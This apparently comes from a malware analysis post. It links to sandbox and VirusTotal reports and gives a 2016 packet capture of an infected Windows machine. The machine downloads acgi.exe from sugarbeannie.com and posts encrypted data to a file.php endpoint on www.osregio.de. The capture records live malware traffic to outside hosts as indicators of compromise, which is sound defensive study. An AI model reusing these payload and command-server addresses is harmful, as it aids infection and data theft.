https://malwr.com/analysis/NzM3YjRiY2NhMmI1NDljNjhjNTkwMDk2NjkzYmFlYjQ/ https://www.virustotal.com/en/file/0858e188c9312ee2e4cf3c85ae4ba11dafba30a1dca36ca40a2d2d5f712f07af/analysis/1477177765/   2016-10-23 00:52:03.435441 IP 192.168.1.102.58739 > 103.44.63.13.80: Flags [P.], seq 0:293, ack 1, win 256, length 293: HTTP: GET /files/acgi.exe HTTP/1.1 E..Ml.@…$….fg,?..s.Pl.{….(P…….GET /files/acgi.exe HTTP/1.1 Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */* Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0) Accept-Encoding: gzip, deflate Host: sugarbeannie.com Connection: Keep-Alive — E..(..@……..f%..,.v.Pb..:p..AP…`9…….. 2016-10-23 00:52:37.816876 IP 192.168.1.102.58742 > 37.17.224.44.80: Flags [P.], seq 0:358, ack 1, win 256, length 358: HTTP: POST /images/file.php HTTP/1.1 E…..@……..f%..,.v.Pb..:p..AP…. ..POST /images/file.php HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0) Host: www.osregio.de Content-Length: 142 Connection: Keep-Alive Cache-Control: no-cache .&.D’.A…7.O7..(…..]….IZ….#n…..H       h..M./..”..`….M.c9…w…”l&.m.!…J/}…x.c……A…..Q.{..y..Q%|.|…p.>..a.@’9,.<..L.P..R.~U.. — E..(..@……..f%..,.w.P@…….P….m…….. 2016-10-23 […]